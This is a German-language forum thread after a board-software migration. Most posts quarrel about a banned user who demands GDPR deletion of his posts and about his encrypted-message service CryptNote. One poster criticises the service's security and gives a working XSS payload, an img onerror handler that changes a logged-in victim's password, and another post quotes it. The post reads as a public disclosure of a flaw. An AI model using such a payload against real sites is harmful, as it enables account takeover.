• Hallo liebe Userinnen und User,

    nach bereits längeren Planungen und Vorbereitungen sind wir nun von vBulletin auf Xenforo umgestiegen. Die Umstellung musste leider aufgrund der Serverprobleme der letzten Tage notgedrungen vorverlegt werden. Das neue Forum ist soweit voll funktionsfähig, allerdings sind noch nicht alle der gewohnten Funktionen vorhanden. Nach Möglichkeit werden wir sie in den nächsten Wochen nachrüsten. Dafür sollte es nun einige der Probleme lösen, die wir in den letzten Tagen, Wochen und Monaten hatten. Auch der Server ist nun potenter als bei unserem alten Hoster, wodurch wir nun langfristig den Tank mit Bytes vollgetankt haben.

    Anfangs mag die neue Boardsoftware etwas ungewohnt sein, aber man findet sich recht schnell ein. Wir wissen, dass ihr alle Gewohnheitstiere seid, aber gebt dem neuen Board eine Chance.
    Sollte etwas der neuen oder auch gewohnten Funktionen unklar sein, könnt ihr den "Wo issn da der Button zu"-Thread im Feedback nutzen. Bugs meldet ihr bitte im Bugtracker, es wird sicher welche geben die uns noch nicht aufgefallen sind. Ich werde das dann versuchen, halbwegs im Startbeitrag übersichtlich zu halten, was an Arbeit noch aussteht.

    Neu ist, dass die Boardsoftware deutlich besser für Mobiltelefone und diverse Endgeräte geeignet ist und nun auch im mobilen Style alle Funktionen verfügbar sind. Am Desktop findet ihr oben rechts sowohl den Umschalter zwischen hellem und dunklem Style. Am Handy ist der Hell-/Dunkelschalter am Ende der Seite. Damit sollte zukünftig jeder sein Board so konfigurieren können, wie es ihm am liebsten ist.


    Die restlichen Funktionen sollten eigentlich soweit wie gewohnt funktionieren. Einfach mal ein wenig damit spielen oder bei Unklarheiten im Thread nachfragen. Viel Spaß im ngb 2.0.

cryptnote.net - Versende verschlüsselte, anonyme, selbstzerstörende Nachrichten

one

Querulant

Registriert
21 Juli 2013
Beiträge
4.046
Ort
ja
Re: .

Hiermit bitte ich um die DSGVO-konforme Löschung dieses Threads und meines Benutzerkontos.

Ich bin nicht damit einverstanden, dass Beiträge innerhalb dieses Threads von mir hier wiederhergestellt werden.


1. Deine Beiträge unterliegen keinem Urheberrechtsschutz. Die schöpferische Höhe ist ansonsten von Dir zu belegen. Diesem Umstand hast du bei Deiner Registrierung in diesem Forum zugestimmt. Du hast deine Beiträge hier zur freien Verfügung gestellt und das Recht auf eine Entfernung dieser durch die Registrierung verworfen bzw. der Erhaltung dieser zugestimmt. Eine Entfernung von Beiträgen und das Trennen des Zusammenhangs eines Fadens (Threads) entspricht nicht dem Sinn eines Forums.

2. Nichtjuristische Meinung meinerseits: Du bist ein seltsamer Kunde. Du verhältst Dich wie ein Elefant im Porzellanladen und wunderst dich dann, das es nicht geschickt war, das ganze Porzellan kaputt zu machen.

3. Juristische Meinung meinerseits: dein nächstes Nachahmen meiner Identität wird dich sehr viel Geld kosten.

4. Wenn du nicht damit einverstanden bist, dass von Dir aus nichts wiederhergestellt wird, dann liegt das in deiner Macht.

von mir hier wiederhergestellt werden.

*vogelzeig*

5. Alternative: Artikulation üben. Deutsch 5. Klasse.
 
Zuletzt bearbeitet:

Trolling Stone

Troll Landa

Registriert
14 Juli 2013
Beiträge
23.873
Ort
Trollenhagen
Re: .

Ich bitte um Wiederherstellung sämtlicher Beiträge des Users, damit dies als abschreckendes Beispiel für die Nachwelt erhalten bleibt.

Dies ist historisch wertvoll und ich beantrage Denkmalschutz.
 

one

Querulant

Registriert
21 Juli 2013
Beiträge
4.046
Ort
ja
Re: .

Das habe ich gerade schon per "melden" gemacht und würde wäre dankbar sein, wenn dies auch geschieht.
 
Zuletzt bearbeitet:

KaPiTN

♪♪♫ wild at heart ♪♫♫♪

Registriert
14 Juli 2013
Beiträge
29.138
Re: .

Sie werden es nie lernen.
 

Metal_Warrior

Defender of Freedom
Teammitglied

Registriert
10 Aug. 2013
Beiträge
6.827
Ort
/dev/mapper/home
@one: Das meiste macht PN; (ist nicht sein Forum, drfuture wäre im Werbekeller zuständig, mein Fehler). Ich hab ihn nur dauerhaft vor die Tür gesetzt, und die Löschung kann er sich bei der Jungfrau Maria erbetteln. Die hats ja bekanntlich mit Wundern.
 
Zuletzt bearbeitet:

one

Querulant

Registriert
21 Juli 2013
Beiträge
4.046
Ort
ja
Ich bekomme immer mehr so den Eindruck, dass du ein verkleideter Kugelfisch bist. Sowohl deine Handlungen und auch dein Wissen (was ich ich anderen Thread mitlese) passen zusammen. :D
 

poesie noire

vivo forlasis

Registriert
14 Juli 2013
Beiträge
6.101
Die Lady hat auch noch ein paar wiederhergestellt. Müsste alles wieder da sein. Wenn nicht, bitte melden. Seh nur noch Buchstabensalat mit meiner Migräne. (...die ich schon vorher hatte)
 

one

Querulant

Registriert
21 Juli 2013
Beiträge
4.046
Ort
ja
Oke, ich nenne dich ab sofort Wonda. Das sollte geheim genug sein.
 

Dr. M.

Weltmaschinenfahrer

Registriert
30 Juli 2018
Beiträge
170
Ich weiss ja, vielleicht sollte ich das nicht tun ... aber gut, statt Einsicht kommen ja eh nur mehr oder weniger wueste Provokationen zurueck ... also:

Dass es keine gute Idee ist, bei einem (vermeintlich) sicherheitsrelevanten Dienst JavaScript zu erzwingen, ist eine Sache.
Dass es keine gute Idee ist, einen User sein Passwort aendern zu lassen, ohne dabei das alte Passwort einzugeben eine andere.
Und dass man HTML nicht mit regulaeren Ausdruecken filtert, eine dritte.

Oder mal so: Wer traut sich eine Nachricht zu entschluesseln, waehrend er bei CryptNote eingeloggt ist?
Falls der Inhalt der Nachricht naemlich rein zufaellig
Code:
M. was here ;-)<img onerror="M=new XMLHttpRequest();M.open('post','updatesettings',true);M.setRequestHeader('Content-Type','application/x-www-form-urlencoded');M.send('setpassword=MMMMMM&confirmpass=MMMMMM')" src
M
sein sollte, ist das Passwort danach rein zufaellig auf "MMMMMM" geaendert :D
 

dexter

Cloogshicer®
Teammitglied

Registriert
14 Juli 2013
Beiträge
4.111
Re: .

Ich bitte um Wiederherstellung sämtlicher Beiträge des Users, damit dies als abschreckendes Beispiel für die Nachwelt erhalten bleibt.

Dies ist historisch wertvoll und ich beantrage Denkmalschutz.

Du kannst hier viel wollen, solang Du das nicht beim Patentamt anmeldest, wirst Du einfach gepflegt ablaufen.
 

RedlightX

Bekannter NGBler

Registriert
18 Juli 2013
Beiträge
1.178
Code:
M. was here ;-)<img onerror="M=new XMLHttpRequest();M.open('post','updatesettings',true);M.setRequestHeader('Content-Type','application/x-www-form-urlencoded');M.send('setpassword=MMMMMM&confirmpass=MMMMMM')" src
M
sein sollte, ist das Passwort danach rein zufaellig auf "MMMMMM" geaendert :D


Hatte er nicht gesagt, es wurde ein Audit oder sowas gemacht? Zumindest von irgendeiner Bande der Code geprüft? :D
 

Metal_Warrior

Defender of Freedom
Teammitglied

Registriert
10 Aug. 2013
Beiträge
6.827
Ort
/dev/mapper/home
@RedlightX: Was ich mittlerweile so an Audit-Geschichten mitbekommen habe, kann das gut sein. Wer Trottel gut oder gute Leute schlecht bezahlt, bekommt halt nur das Offensichtliche gesagt...
 

darksider3

NGBler

Registriert
18 Sep. 2013
Beiträge
393
Ort
/dev/sda
Seinem Track-Record vom Verhalten ggü. Leuten, die versuchen, sein Projekt irgendwie von einem technischen Aspekt zu beleuchten nach zu Urteilen, hat er einfach irgendeinem Dude in irgendeinem IRC geglaubt, das er OpSec-Experte ist, sich ein paar Hundert Euronen geben lassen und behauptet, alles sei wunderbrar.
 

darksider3

NGBler

Registriert
18 Sep. 2013
Beiträge
393
Ort
/dev/sda
@Mods: Die Wortmarkenanmeldung ist öffentlich einsehbar(und das mit Absicht, so funktionieren Wortmarkenanmeldungen in Deutschland halt), und sein Github-Repo, das er gelöscht hat, erwähnt er selbst. Darf ich fragen, wieso die Links raus mussten? O.o
Oder hat er mit Anwälten gedroht? :eek:
 
Oben